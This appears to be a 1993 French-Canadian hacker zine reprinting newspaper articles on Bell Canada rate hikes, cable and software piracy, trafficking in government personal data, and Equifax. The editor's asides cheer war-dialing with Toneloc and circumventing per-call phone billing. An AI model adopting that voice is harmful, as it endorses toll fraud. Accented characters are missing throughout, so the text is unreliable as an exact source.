populaire anglaise "Il n'y a pas de quoi crire
sa mre". Avec une
telle hausse apprhende, on est tous mieux d'appeler nos mres avant
septembre, parce que, aprs cette date, il sera plus conomique de
correspondre par la poste!
videmment, j'exagre. Mais dans le contexte actuel d'une inflation
enraye, d'une croissance timide et d'une reprise incertaine, la requte
de bell Canada est audacieuse, pour ne pas dire irraliste.
Il fallait s'attendre que notre compagnie de tlphone, qui a
toujours vcu sous la coupe dore d'un monopole, ajuste sa grille
tarifaire
son nouvel environnement concurrentiel.
Mais tous s'attendaient
ce que Bell ait au moins
subir les
contrecoups de la drglementation dans l'interurbain avant de frapper
sur le service de base qu'elle finance
perte depuis des annes.
A titre d'entreprise de service public qui n'a jamais eu
souffrir
de concurrence -par opposition
Gaz Mtro, par exemple, qui doit
affronter quotidiennement la machine d'tat qu'est Hydro-Qubec- Bell a
toujours bnfici d'un taux de rendement allchant. Entre 12.5% et 13.5%
annuellement, et ce, sans avoir de concurrents dans les pattes.
C'est en vertu de ce taux de rendement que Bell a enregistr des
profits de 1 milliard, en 1992, et a permis
son holding, BCE, de
dgager un bnfice net de 1,4 milliard, pour l'anne.
Combien d'entreprises ont pu raliser un tel taux de rendement au
cours des trois dernires annes alors que plusieurs d'entre elles ont
plutt assist
l'effondrement de leur march?
Beaucoup de ces entreprises se seraient contentes de raliser le
rendement de 7% qu'offrent les certificats de placement des banques pour
des termes de cinq ans!
La ralit
Le pire dans tout cela, c'est que Bell Canada est justifie, ou sera
justifie, d'augmenter le cot de son service de base.
Depuis quatre ans, dj
, que Bell nous prvient que le jour o le
march de l'interurbain ne sera plus sa cagnotte exclusive, elle devra
facturer les clients de son service de base en consquence.
On le sait, pour que nous ayons droit
une facture mensuelle d'une
dizaine de dollars, il en cote 40 $ par mois
Bell pour fournir cette
seule ligne tlphonique.
De tout temps, Bell a appliqu une politique d'interfinancement en
utilisant les gnreux profits de l'interurbain pour soutenir le service
de base.
L'arrive massive des entreprises qui achtent des circuits
tlphoniques pour les louer
rabais
certains clients et, surtout,
l'entre en scne d'Unitel, appuye par AT&T, qui va concurrencer Bell
directement auprs des simples usagers pour les interurbains, ne
permettra plus
notre compagnie de tlphone de financer son service de
base.
Ce sera donc
nous de payer la juste part du cot d'utilisation de
notre tlphone.
Sauf que bell nous demande de payer ds avril une premire
augmentation et une seconde, en septembre, afin de se prmunir contre la
baisse du taux de rendement de son action
la Bourse.
L'immense majorit des sept millions de clients de Bell Canada n'est
pas actionnaire de la compagnie et ne se serait pas sentie menace
d'absorber la hausse de tarifs sur une ou deux annes, mme si le taux de
rendement en souffre un peu.
La menace que nous brandit Bell Canada de voir ses possibilits de
financement rduites sur les marchs financiers, si son taux de rendement
est affect, ne justifie pas une augmentation du tarif de base aussi
abrupte dans le temps.
- 30 -
[Blitz- Le mec est timor, tout de mme. Travaillerait-il pour Bell, pour
tre aussi doux? Le jour vient, mes frres (et il vient vite) o il va
falloir payer pour chaque appel qu'on fait. Votre tarif de base va
comprendre quelque chose comme 150 appels par mois, et chaque appel
supplmentaire va vous coter dix sous. Imaginez l'horreur pour les babs,
ou pour ceux qui scannent 50 ou 60 mille numros par mois avec Toneloc!
Bell ouvre donc la porte
d'autres formes d'abus de la part de ses
utilisateurs, car il est bien certain que nous allons, tous ensemble,
trouver le moyen de contrer cette facturation honte...]
Leeched from LA PRESSE - Lundi 15 fvrier 1993
INTERURBAIN: LA CONCURRENCE MOINS RENTABLE
QUE PRVU POUR LE CONSOMMATEUR
Presse Canadienne - La concurrence dans l'interurbain pourrait ne pas
offrir aux Canadiens les grandes conomies annonces, croit une experte
amricaine.
"Le march de l'interurbain a t ouvert
la concurrence aux
tats-unis il y a neuf ans, nous connaissons donc ce qui pourrait advenir
au Canada", raconte Minnie Rajwar, du Telecommunications Research and
Action Center, de Washington.
Cet organisme
but non lucratif examine les activits et tarifs des
trois grandes compagnies d'interurbain et des centaines de compagnies
rgionales apparues durant la dcennie, dans ce riche march.
Les compagnies promettent de fortes conomies
la clientle mais,
explique en entrevue Mme Rajwar, les vraies rductions sur la facture
sont souvent moindres que ce qui avait t miroit.
"D'habitude, les compagnies parlent de rductions de 20
30 p.
cent. Mais selon nos chiffres, l'conomie vritable n'est que de 8 p.
cent environ."
Suivant le problme au USA - et possiblement au Canada - les
factures viennent toujours des compagnies locales ou rgionales.
Certaines de ces grandes compagnies de services ont ajout au service
local des frais supplmentaires, qui en fait annulent les conomies sur
l'interurbain.
En juin 1992, le CRTC a autoris la concurrence dans l'interurbain
au Canada. Mais des recours devant les tribunaux en ont retard jusqu'en
janvier l'avnement, entre cinq compagnies nationales et rgionales.
La plus grande, Bell canada, a dj
demand au CRTC de hausser ses
tarifs locaux de 65 p. cent, en commenant le 1er avril. Si cela est
autoris au complet, la base du tarif mensuel local,
Toronto, Ottawa et
Montral, grimperait de 12.60 $
19 $.
Bell Canada rtorque qu'elle n'a pas accru son tarif local de puis
10 ans et qu'il lui faut cette augmentation, pour compenser la perte de
son monopole de l'interurbain qui rapportait de gros profits.
"L'ampleur des hausses demandes est scandaleuse", lance George
Horhota, de la Canadian Business Telecommunications Alliance.
"Ne vous scandalisez pas, dit Mme Rajwar, c'est la ralit que
subissent dj
les Amricains. Nous disons d'abord au gens de ne pas
croire ces annonces
la tlvision, qui promettent des conomies
d'interurbain. Surveillez bien le montant, au bas de votre facture.
Selon M. Eamon Hoey, consultant en communications, le seul moyen
pour les Canadiens d'viter cette situation est de protester avec nergie
auprs du gouvernement fdral.
"L'poque de Maman Bell est rvolue. Les Canadiens doivent forcer
Ottawa
empcher que la stabilit des tarifs locaux soit sacrifie
la
concurrence dans l'interurbain", affirme M. Hoey.
Une vraie concurrence dans l'interurbain pourrait faire conomiser
aux abonns rsidentiels et commerciaux jusqu'
2 milliards par anne,
dit-il.
- 30 -
Leeched from LA PRESSE - Lundi 21 fvrier 1993
DES ABONNS DE BELL DISENT LEUR INDIGNATION AU CRTC
Un monopole puissant, trs riche et qui n'a d'gard
pour personne
Presse Canadienne- La demande de Bell Canada pour tre autorise
augmenter de 60 p. cent cette anne les tarifs locaux de ses clients en
Ontario et au Qubec a soulev la fureur de certains abonns.
Ils ont fait part de leur indignation dans des lettres adresses au
Conseil de la radiodiffusion et des tlcommunications canadiennes
(CRTC), qui a invit les abonns
faire connatre leurs point de vue sur
l'augmentation des tarifs demand par Bell, ainsi que sur son plan visant
largir les zones d'appel local
Ottawa, Toronto et Montral.
Des 159 lettres reues jusqu'
maintenant, quelques-unes demandaient
des prcisions, tandis que 23 appuyaient une certaine hausse des tarifs
ou l'largissement des zones d'appel local.
Un abonn g a crit: "Je suis pris en otage dans ma propre
province. Vous tes oblig de payer, sinon on vous coupe le tlphone."
Un groupe de locataires a crit: "Nous esprons que le CRTC
rejettera cette tentative outrageante de Bell Canada de donner la
prfrence
ses actionnaires plutt qu'
ses abonns gs et aux autres
qui ont fait de Bell Canada ce qu'elle est aujourd'hui: Un monopole
puissant, trs riche et qui n'a d'gard pour personne."
Parmi les questions souleves par ceux et celles qui s'opposaient
l'augmentation des tarifs, il y avait notamment:
-Les avantages de l'largissement des districts d'appel local
s'appliquent
une minorit, mais seraient pays par la majorit.
-Bell cherche
liminer la concurrence sur les interurbains en
largissant ses zones d'appel local.
-Bell ralise des profits plus que raisonnables.
-Si Bell a besoin de plus d'argent, elle devrait rduire ses
dpenses inutiles comme les autres entreprises ont d le faire durant la
rcession.
-Bell utilise la concurrence dans le march interurbain comme une
excuse pour hausser les tarifs locaux, mais la concurrence est toujours
inexistante dans de nombreuses rgions desservies par Bell.
D'autres ont crit pour dire qu'ils avaient perdu leurs emplois ou
taient des personnes ges ayant un revenu fixe et ne pouvaient pas
payer les hausses de tarif.
Bell prcise que les augmentations rapporteront
la compagnie 210
millions de plus en 1993 et 450 millions en 1994.
Leeched from LE SOLEIL - Vendredi 5 fvrier
Tel est pris qui se croyait cbl...
HARTFORD (Reuter) - Bien mal cbl ne profite jamais.
C'est ce qu'on dcouvert
leurs dpens 140
tlspectateurs amricains trop malins, qui utilisaient
des dcodeurs pirates pour s'offrir gratuitement les
programmes d'une chane cble. Ils n'ont pu rsister au
tee-shirt gratuit que leur offrait la chane Continental
Cablevision pendant la retransmission d'un match de boxe.
Un simple coup de fil au numro de tlphone affich
l'cran suffisait pour obtenir le superbe cadeau. Ce
qu'ignoraient les fraudeurs, c'est que le message ne
pouvait tre aperu que par les dtenteurs d'un dcodeur
pirate, qui ont tlphon en toute candeur
la chane.
"Ca a march comme un charme. Les gens qui ont appel
nous ont donn leurs noms et adresses pour que nous
puissions leur envoyer le tee-shirt", a expliqu un
responsable de la Continental. Ils ont reu
la place
une amende de 2000 $ US.
(Dumb fucks! - Blitzkreig)
------------------
Leeched from LE NOUVEL OBSERVATEUR No 1473
du 28 janvier au 3 fvrier
(contribution de Satan's Ghost - Paris - ces deux
entrefilets entouraient un long article assez soporifique
sur les jeux vido, que nous ne reproduiront pas ici...
Le premier entrefilet concerne des cas de kids
britanniques qui faisaient des crises d'pilepsie devant
leur SNES...)
EPILEPSIE: SUPER MARIO INNOCENT
par Grard Petitjean
M. Nintendo et M. Sega ont eu chaud. Quand la rumeur a
commenc de courir dans les colonnes de la presse
britannique, les ftes de Nol taient passes. Les
ventes de consoles taient faites. Tous ces gamins qui
avaient eu le bon got d'attendre la fin du rveillon
pour faire une crise d'pilepsie aprs avoir titill leur
console pendant des heures ont rendu un fier service
la
Bourse de Tokyo. Le titre Nintendo n'a perdu que 100
yens. Pour l'instant, une dizaine d'enfants ont t
atteints sur la plante. C'est peu: on dnombre 150
millions de fans de "Sonic" ou de "Super Mario"
travers
le monde. Et pas trop inquitant. car, nous apprennent
les neurologues, la console ne fabrique pas des
pileptiques: elle les rvle, en soumettant les yeux de
l'enfant
une lumire intermittente. Test que pratiquent
les neurologues dans leurs cabinets pour dceler une
ventuelle propension
l'pilepsie. La tlvision joue
parfois des tours du mme genre. Au XIXe sicle dj
, on
observait une recrudescence des crises d'pilepsie dans
les diligences qui empruntaient, les jours de soleil, les
routes bordes de platane du sud de la France.
Il faut donc conseiller aux nintendomaniaques de ne pas
jouer trop longtemps, de s'installer dans une pice bien
claire, etc. Autant de conseils qui figureront
l'avenir sur les emballages des consoles.
PIRATES
par
Grard Petitjean
"Je n'ai jamais achet un jeu. Pourtant je joue presque
tous les jours. Simplement, ds qu'on me parle d'un super
logiciel, j'attends qu'un de mes copains me le procure.
En gnral, je n'attends pas longtemps..." Sbastien a
des copains pirates. Pas sur L'le de la Tortue:
Puteaux. Des dieux de l'informatique qui se jouent des
piges tendus par les diteurs
ceux qui voudraient
s'approprier leurs oeuvres sans passer par le tiroir-
caisse. Un vrai gang. "Le premier qui voit un jeu, que ce
soit en France, en Angleterre ou aux tats-unis, l'achte
et l'envoie par modem aux "crackers" qui vont le
"dplomber". Et l
, c'est la course: celui qui casse le
plus vite la protection d'un jeu est reconnu par ses
pairs, il accde
des rseaux o il bnificiera
son
tour de logiciels dplombs..."
Sbastien a un copain qui fait partie de ces rseaux. La
protection la plus coriace qu'il ait rencontre lui a
demand quatre jours d'efforts. Gnralement, un quart
d'heure suffit. Bien sr, ces exploits n'arrachent pas de
cris d'admiration aux diteurs de jeux. Pour trois jeux
que nous vendons, affirment-ils, il y en a dix en
circulation. "Ils sont paranos!, disent les journalistes
de "GEN 4", qui connaissent bien leur petit milieu.
"Disons qu'il y a plutt un jeu copi pour un vendu. Et
toutes ces copies, les diteurs savent trs bien qu'ils
ne les auraient jamais vendues. On prend un jeu pirat
"pour voir". On conservera la copie si le jeu ne vaut pas
le coup. S'il est bon, si on sent qu'on va passer des
semaines dessus, on l'achte."
- 30 -
[ Les deux prochains articles de Michel Venne sont tirs
d'une srie d'articles crits pour le quotidien LE
DEVOIR, srie intitule L'TAT SAIT TOUT. La srie dans
son entier mrite d'tre lue, soyez-en srs, mais nous ne
reproduirons ici, du moins ce mois-ci, que deux articles
parmi tous ceux parus, le premier parce qu'il dmontre
qu'quifax est une compagnie de crosseurs, et le deuxime
parce que... vous verrez bien... -Blitzkreig ]
Leeched from LE DEVOIR - 11 fvrier 1993
DES FONCTIONNAIRES DANS LE MARCH NOIR
DU RENSEIGNEMENT CONFIDENTIEL
par
Michel Venne
Des fonctionnaires paient leurs informateurs
avec des renseignements confidentiels. LE
DEVOIR a tent l'exprience. Ca marche...
Les fichiers de renseignements personnels du gouvernement
sont des paniers percs. Le vrificateur gnral a dj
mis en lumire les lacunes des systmes de scurit des
banques de donnes. LE DEVOIR a pu exprimenter le march
noir du renseignement personnel. C'est, au Qubec, un
march florissant.
Deux enquteurs privs, compltement indpendants
l'un de l'autre, ont accept de collaborer avec nous. et
trois citoyens cobayes nous ont permis de faire enqute
sur eux.
Nous avons fourni
nos deux enquteurs le nom et le
numro d'assurance-sociale de nos cobayes.
Quelques jours plus tard, ils nous ont communiqu
l'adresse, le numro de tlphone, la date de naissance
de nos amis ainsi que, le cas chant, l'ge des enfants,
le montant des prestations d'aide sociale et d'assurance-
chmage qui leur sont ou leur ont t verses et pendant
combien de temps, le numro d'aide sociale, le numro de
permis de conduire, le contenu du dossier conducteur
(points d'inaptitude) dtenu par la Socit de
l'assurance automobile, le contenu de leur dossier
la
commission de la sant et de la scurit du travail
(CSST).
Nos cobayes nous ont certifi n'avoir jamais
communiqu avec ces dtectives et n'avoir jamais fait
l'objet d'aucune enqute dans leur entourage.
Ces renseignements ont t recueillis au sein du
gouvernement.
Lorsque nos deux Sherlock Holmes ont fait leur
rapport, nous leur avons propos de couvrir leurs frais.
Nous imaginions que leurs contacts leur fournissaient ces
renseignements contre rmunration. Mais il n'en tait
rien.
Des fonctionnaires fournissent en effet
gracieusement des renseignements confidentiels
des
enquteurs privs, en change de leur collaboration.
L'un de nos deux dtectives privs
quelques
contacts au service des enqutes de l'aide sociale. Ces
contacts, dit-il, lui fournissent le contenu de dossiers
de bnficiaires dont ses clients, des avocats
gnralement, cherchent
retrouver la trace.
En change, il leur promet de leur fournir des
informations sur des assists sociaux qui font l'objet
d'une enqute pour fraude. S'il apprend qu'un assist
social travaille au noir, par exemple, il le dnonce.
Cet enquteur priv
dj
t employ du Bureau de
crdit de Montral (quifax). A ce titre, il communiquait
souvent
ses contacts au sein du gouvernement la fiche
de crdit d'un contribuable souponn de fraude. C'est
ainsi qu'il rcompensait ses informateurs.
En retour, ces commis de l'tat rmunraient leur
clandestin collaborateur avec des renseignements
personnels appartenant
d'honntes citoyens qui
s'attendent
la confidentialit.
Le second dtective qui a collabor avec nous
corrobore sans hsitation cette version des faits.
"J'aide des fonctionnaires
faire leur travail",
dit-il tout bonnement. Il affirme servir parfois
d'intermdiaire pour un fonctionnaire de l'aide sociale
qui voudrait vrifier une information sur un bnficiaire
que possde la CSST.
Des fonctionnaires prfrent cependant agir contre
espces sonnantes et trbuchantes et arrondir leurs fins
de mois en acceptant quelques billets sous la table.
L'une de nos sources relate le cas d'un enquteur de
l'aide sociale qui fournissait de 75
100 dossiers
d'assists sociaux par jour
un collgue du bureau de
crdit. Il recevait en retour 1$ par dossier.
D'autres acceptent pour leurs bons services une
bouteille de cognac
Nol.
Ces liaisons dangereuses existent dans
peu prs
tous les organismes publics dtenteurs de fichiers
importants. La Sret du Qubec et son Centre de
renseignement policier,
Parthenais, n'y chappent pas,
selon nos sources.
Dans son bulletin d'information confidentiel de
dcembre 1991, le Centre admet candidement devoir
"malheureusement dplorer plusieurs bris de scurit au
niveau de l,aspect confidentiel des informations
contenues au CRPQ".
Il arrive que des fonctionnaires se font prendre
ce petit jeu. Et lorsque c'est le cas, la justice ne
s'acharne pas sur le sort du coupable.
Un fonctionnaire de l'assurance-chmage a t
reconnu coupable en dcembre dernier d'avoir vendu (20$
pice, pour un magot d'au moins 2000$), des
renseignements personnels sur des chmeurs
un ami
dtective priv.
Le tribunal lui a accord une libration
conditionnelle
un don de 55$
la Socit canadienne du
cancer...
A la suite d'un reportage du journaliste Normand
Lester
Radio-Canada en octobre dernier, faisant tat
d'un trafic semblable
l'aide sociale, le ministre de
la Main-d'oeuvre et de la Scurit du revenu a suspendu
de ses fonctions un de ses employs pour la dure d'une
enqute qui est en cours
la Sret du Qubec.
La porte-parole du ministre Andr Bourbeau affirme
qu'il s'agit d'un "cas isol", que les systmes
d'information du ministre sont
"toute preuve"
cet
gard. Les employs signent un engagement de
confidentialit, dit-elle.
Ce n'tait pas la premire fois que ce ministre
tait mis en cause pour bris de confidentialit. En 1988,
le ministre Pierre Paradis avait d dclencher une
enqute policire sur un trafic de renseignements. Deux
fonctionnaires avaient t poursuivis en justice.
Le prsident de la Commission d'accs
l'information, M. Paul-Andr Comeau, est conscient de
l'existence de ce march noir. "On peut promettre la
confidentialit, dit-il en entrevue. Mais on ne pourra
jamais promettre qu'il n'y aura jamais de fraude. Parce
que c'est une composante de la nature humaine."
Si la technologie "amplifie le risque", M. Comeau
rappelle "que les dossiers de papier circulaient,
tranaient et se vendaient". Il note toutefois qu'avec le
dveloppement des technologies de l'information, les
tats se sont dots de lois pour protger la vie prive.
Le gouvernement du Qubec, dit-il, "a dcid de se
morigner lui-mme", en 1982, en se dotant d'une loi
cette fin, qui n'existait pas avant l'informatique.
Le problme, ajoute M. Comeau, c'est que les
organismes oprent sans filet. Il donne l'exemple de la
CSST o on a dcouvert que les 2000 employs ont accs
aux fichiers d'un bnficiaire. Les consultations ne sont
pas enregistres. De sorte qu'il est impossible de
reprer la source d'une fuite. L'organisme doit, d'ici
1996, modifier son systme pour palier cette lacune.
Dans ses deux derniers rapports annuels, le
vrificateur gnral du Qubec, M. Guy Breton, identifie
de nombreuses lacunes
la scurit des systmes
informatiques.
"Il n'y a pas de proccupation quotidienne pour la
scurit, dit-il en entrevue. Tout le monde n'est pas
convaincu de la ncessit de protger l'information. Il
s,est tabli une confiance que ca va bien, que ces
machines s'autocontrlent et qu'on ne devrait pas
s'nerver avec ca".
De manire gnrale, M. Breton observe que les gens
ne sont pas assez prudents avec les mots de passe et les
codes qui leur donnent accs aux systmes. "Les gens se
les prtent", dit-il, ou alors ils conservent le mme
durant des annes. "Tout le monde sait que le mot de
passe du collgue, c'est le nom de sa femme".
M. Breton note que l'information, c'est le pouvoir.
C'est pour cela que le gouvernement est puissant, dit-il.
"Il l'a toute". Mais "quand il la laisse fuir, il y a des
gens qui en profitent et qui se gagnent du pouvoir avec.
La rgle, ajoute-t-il, devrait tre qu'on soit tous gaux
devant ce que le gouvernement possde."
- 30 -
Leeched from LE DEVOIR - Vendredi 19 fvrier 1993
LA LOI SUR LA VIE PRIVE LAISSE DES TROUS
BANTS...ET LE CONSEIL DU PATRONAT S'Y OPPOSE
par
Danny Vear
Le Conseil du patronat s'oppose farouchement au
projet de loi sur la protection des renseignements
personnels dans le secteur priv.
Au mieux, il en demande le retrait pur et simple. Au
pire, il croit ncessaire que des amendements srieux y
soient apports.
"Le projet de loi 68 va trop loin. Il en demande
trop aux entreprises", a affirm hier le prsident du
Conseil du patronat du Qubec, Ghislain Dufour.
Le CPQ croit que le ministre des Communications,
Laurence Cannon, n'a pas mesur l'impact de son projet.
Ainsi, toutes les entreprises qubcoises se verraient
imposer un systme de protection des renseignements
personnels qui est beaucoup plus strict, complexe et
coteux que les systmes en vigueur dans les autres
provinces canadiennes et dans les autres pays, crit le
Conseil dans son mmoire prsent
la Commission
parlementaire charge d'examiner le projet de loi.
(...)
Les entreprises devraient constamment tenir
jour
leurs registres de renseignements personnels et veiller
ce qu'ils soient exacts et complets.
Ghislain Dufour reconnat que certains secteurs de
l'conomie ont de mauvaises pratiques en ce qui concerne
l'information sur les citoyens. Ce constat ne doit pas
pousser le gouvernement
rglementer tous les secteurs
de l'conomie, dit-il.
Le prsident du CPQ s'est port
la dfense
d'quifax, firme qui pratique le commerce des
renseignements personnels, prpare des rapports de crdit
aux institutions bancaires qui lui en font la demande et
dtient des informations sur environ 4 millions de
Qubcois.
Selon lui, il est insens qu'quifax soit oblig
d'informer chacune des personnes sur lequel elle dtient
des informations de l'existence d'un tel dossier. Le
prsident d'Quifax, Jean-Claude Chartrand, a dj
exprim de srieuses rserves
l'endroit du projet de
loi 68.
Enfin, le Conseil s'inquite des nouveaux pouvoirs
de la Commission d'accs
l'information, dmesurs,
selon lui.
Le Conseil du patronat souscrit aux objectifs viss
par le projet de loi.
Il croit toutefois que l'autorglementation des
entreprises suffirait
les atteindre.
- 30 -
Leeched from LE DEVOIR - lundi 8 fvrier 1993
par
Michel Venne
Big Brother
LE RICIB, OU TOUT SAVOIR SUR N'IMPORTE QUI, N'IMPORTE
QUAND
[suit un graphique d'un rseau tellement pt que je
dfie n'importe qui de reproduire a en ascii]
(lgende du graphique: votre nom circule quelque part
dans cette constellation de canaux de communication.)
Le gouvernement du Qubec a autoris la cration d'une
autoroute lectronique qui reliera tous les ministres et
les organismes publics, dont la Rgie de l'assurance-
maladie ou la Socit de l'assurance automobile.
A un cot de 20 millions de dollars, Qubec cre un
Rseau intgr de communications informatiques et
bureautiques.
Le Ricib - un super-rseau
la fine pointe de
l'informatique - remplacera une quinzaine de rseaux qui
sont propres
chacun des ministres, reliant Qubec
Montral et
quelques 200 villes
travers la province.
Il reliera aux centres-serveurs 27 000 micro-ordinateurs
dissmins sur les pupitres des fonctionnaires.
En somme, crit le ministre des Communications, le
Ricb pourrait permettre "
n'importe qui,
partir d'
peu prs n'importe quel terminal, d'avoir accs
peu
prs
n'importe quelle information dans n'importe quel
ordinateur, peu importe o l'un et l'autre se trouvent".
L'accs au Ricib sera, certes, balis par les lois.
Et des systmes de scurit empcheront l'information de
circuler n'importe comment, nuance le directeur gnral
des tlcommunications du ministre des Communications,
M. Bernard Beauchemin.
Le Ricib est ralis en collaboration avec
l'entreprise prive et constitue un exemple probant de la
manire dont le gouvernement veut aider l'industrie des
technologies de l'information
dvelopper un savoir-
faire exportable.
[Ca serait pas plutt parce que les twits du gouvernement
n<y connaissent rien? - Blitz]
Le ministre des Communications se donne comme
mission de "s'assurer que les grandes proccupations de
l'tat migrent vers le secteur priv, mais toujours dans
un but avou de favoriser le dveloppement d'une
industrie qubcoise des communications", expliquait en
mai dernier, lors d'un colloque, la directrice gnrale
des technologies de l'information du ministre, Mme.
Monique Charbonneau.
Le groupe DMR a dj
obtenu un contrat de 700 000$
pour la ralisation de la conception dtaille du Ricib.
Un nouvel appel d'offres a t lanc l'automne dernier
pour l'achat ou la location d'quipement et la gestion du
rseau proprement dit. Sa mise en oeuvre pourrait dbuter
au printemps.
Ce projet s'insre dans un crneau plutt inoccup,
celui des rseaux privs et intgrs de transmission de
donnes par paquets.
Prsentement, chaque ministre possde son propre
rseaude tlcommunications pour relier entre eux tous
ses bureaux rgionaux
son systme central. Ricib
fusionne ces systmes et permettra de rduire la facture
de tlcommunications, qui s'lve
17 millions par an
pour l'tat.
Les organismes emprunteront la mme route en y
acheminant, par paquets, les informations destines
l'un de ses bureaux. Chaque paquet portera l'adresse du
destinataire. L'ordinateur le dirigera au bon endroit,
par commutation, dans une espce de gare de triage
lectronique situe
la sortie de l'autoroute.
Le systme offrira galement des services de
courrier lectronique, l'change lectronique de
donneset l'accs
des banques de donnes externes. Par
son architecture ouverte, le Ricib pourra s'adapter aux
besoins futurs.
L'AUTOROUTE DES RENSEIGNEMENTS PERSONNELS
1) Qubec se dote d'un rseau lectronique reliant tous
les
ministres
En dpit des avantages administratifs, l'tat a toujours
rsist
l'ide de crer un immense fichier central de
renseignements sur les citoyens. La hantse de Big
Brother fait son oeuvre. mais est-il en train de faire
indirectement ce qu'il n'ose faire ouvertement?
________
Ds sa naissance, des chantillons du sang et de l'urine
des nouveaux-ns sont achemins dans le Rseau qubcois
de mdecine gntique pour analyse: bb a son premier
fichier.
Suivront immdiatement le registre d'tat civil, la
carte d'assurance-maladie, et le fichier
l'hoptal.
Hospitalis, on lui ouvre un dossier dans un fichier
inconnu du grand public: Med-Echo. On y rcolte tous les
renseignements sur les soins reus, la dure du sjour,
les diagnostics. Med-Echo enregistre un million
d'hospitalisations par anne. Le tout est communiqu
Statistique Canada. Bb est fich.
Plus tard vient l'cole: fichiers des rsultats aux
preuves de fin d'tudes. Les loisirs: fichier des
athltes boursiers ou des dtenteurs de permis de chasse.
Junior achte une auto: fichier des conducteurs
automobiles; fichier des sinistres automobiles. Il met
sur pied une petite business: fichier central des
entreprises... et connait quelques dboires: fichier des
individus en faillite.
Fich, qu'il est, le citoyen. L'tat du Qubec
possde
lui seul plus de 14 000 fichiers de
renseignements nominatifs, qui permettent d'identifier la
personne, dont une soixantaine contiennent des
informations sur 100 000 individus ou plus.
C'est devenu un clich de dire que l'tat sait tout.
Mais l'tat sait tout en pices dtaches. Et,
malgr les tentations videntes au plan administratif,
aucun gouvernement n'a encore os franchir le pas de
runir, dans un grand fichier central, tous ces
renseignements sur les citoyens. On a peur de Big
Brother.
Mais on pourrait bientt en arriver l
.
"Ce qui n'a jamais pu tre ralis ouvertement et
directement, est en train de l'tre indirectement", crit
dans un rapport publi en dcembre, le chien de garde de
la vie prive au Qubec, le prsident de la Commission
d'accs
l'information Paul-Andr Comeau.
On le fait "de faon presque invisible pour le
commun des mortels, grce au dveloppement des rseaux
informatiques qui permettent la mise en rseaux de
banques de donnes".
Peu de gens savent que ces renseignements les
concernant circulent entre les diffrents organismes et
les ministres: donnez une adresse
la Rgie des rentes;
elle se retrouve le lendemain dans le fichier de la
Socit d'assurance-automobile".
Vous croyiez donner une information pour obtenir en
retour un diplome, un permis, un chque ou un
certificat:le mme renseignement servira
une recherche
mdicale,
un inventaire des dcrocheurs scolaires,
vous retracer si le fisc est
vos trousses.
Un diagramme indit que nous publions ci-contre [mon
cul! -Blitz] montre une constellation de canaux de
communication; un enchevtrement inextricable
d'organismes du gouvernement du Qubec qui savent des
choses sur vous, et conversent entre eux.
On estime a 20 000 le nombre de circuits par
lesquels circulent
votre insu, des renseignements
personnels
votre sujet.
Un ministre peut, s'il le juge ncessaire,
communiquer un renseignement sans votre consentement.
L'appariement des banques de donnes
gouvernementales est un geste entr dans les moeurs: mme
le Directeur gnral des lections songe
y recourir
pour tenir
jour une future liste lectorale permanente,
grce
laquelle on pourrait liminer le recensement des
lecteurs qui coute chaque fois 20 millions.
Le Protecteur du citoyen, M. Daniel Jacoby,
pourtant trs proccup du respect de la vie prive,
n'chappe pas
la vague: il a demand l'autorisation,
qui lui a t refuse, de mettre en rseau, pour son
usage, tous les grands fichiers que possde le
gouvernement.
Les rcents dveloppements procdent de plusieurs
logiques: efficacit de la gestion, rduction des cots,
contrle, chasse aux fraudeurs.
Le gouvernement ne cache pas son dsir, non plus, de
dvelopper
partir de ses propres besoins, une expertise
prive et exportable dans le domaine d'avenir des
technologies de l'information, qui forment l'une des
grappes industrielles. Tout comme on a mis au monde
l'ingnierie qubcoise avec les grands projets
hydrolectriques. (...)
- 30 -
Leeched from LA PRESSE - Jeudi 25 fvrier 1993
QUIFAX FAIT L'OBJET D'UN PORTRAIT PEU
DIFIANT EN COMMISSION PARLEMENTAIRE
par
Gilles Normand
quifax Canada, compagnie spcialise dans la
constitution de dossiers de crdits et qui possde des
donnes sur plus de 15 millions de Canadiens, a fait
l'objet d'un portrait peu difiant, hier, devant la
commission parlementaire qui tudie le projet de loi sur
la protection des renseignements personnels dans le
secteur priv.
La directrice de l'Association cooprative
d'conomie familiale du Centre de Montral (ACEF-Centre),
Mme Louise Rozon, a en effet soulev quatre cas de
consommateurs qui ont eu
se plaindre du traitement de
leur dossier par quifax, traitement montrant que les
inquitudes qu'entretiennent nombre de citoyens quant aux
pratiques lies
la cueillette et
l'utilisation des
renseignements personnels.
Le tmoignage de Mme Rozon n'a pas laiss insensible
le parrain du projet de loi 68, le ministre Lawrence
Cannon, qui s'est "engag"
analyser trs attentivement
comment donner au projet les moyens de restreindre la
cueillette de renseignements
caractre personnel.
² Un consommateur identifi comme M. Beauregard,
ayant constat que trois entreprises avec lesquelles il
n'avait jamais fait affaire avaient consult son dossier
de crdit, a demand des explications
quifax. Selon
Mme Rozon, il s'est fait rpondre qu'on avait pas
lui
donner de preuves selon lesquelles il aurait ou non donn
son consentement.
Mr. Beauregard, ayant constat qu'une entreprise
avait fait insrer de fausses informations dans son
dossier de crdit, n'a pu obtenir correction ni de la
compagnie ni d'quifax. Son dossier est entre les mains
d'un avocat.
² Un deuxime individu, du nom de M. Aubry, a
consult son dossier aprs qu'on lui eut refus un prt.
Il a constat que la seule information qui s'y trouvait
faisait tat d'un jugement rendu en 1988 relativement
une dette de 240 $ qu'il avait rembours au complet.
Preuves
l'appui, il a demand
quifax d'ajouter
d'autres donnes, relativement
un prt de 13 000 $
rembours sans retard de mme que d'un autre prt de 3
000 $ galement rembours honorablement. quifax, selon
ACEF-Centre, a refus, ne permettant pas ainsi
M. Aubry
d'amliorer la cote de son crdit, et le forant
recourir
l'endossement d'un parent pour une nouvelle
transaction.
² Un M. Cloutier, qui avait perdu sa cause lorsqu'il
avait us de son droit de contester devant les tribunaux
un compte de 300 $ que lui rclamait la ptrolire Esso,
avait vu son crdit afflig de la cote 9, la plus
mauvaise qui soit. Bien qu'Esso ait demand
quifax de
retirer cette cote, rien n'y fit. M. Cloutier n'a eu
droit d'apporter qu'un commentaire
cette inscription.
² Un M. Langlais n'a pu obtenir un prt de la Banque
Royale parce que son dossier de crdit faisait tat d'une
dette de 224 $ envers une compagnie d'assurances. quifax
n'a pas voulu retirer cette donne du dossier de M.
Langlais, en dpit des dmarches en ce sens de la
compagnie d'assurances.
Prsentant un mmoire commun avec la Fdration
nationale des associations de consommateurs du Qubec, la
directrice d'ACEF-Centre a indiqu que son organisme est
devenu membre d'Quifax,
l'automne de 1991, dans le
cadre d'une enqute. Elle a alors constat que "n'importe
qui peut obtenir des renseignements confidentiels en
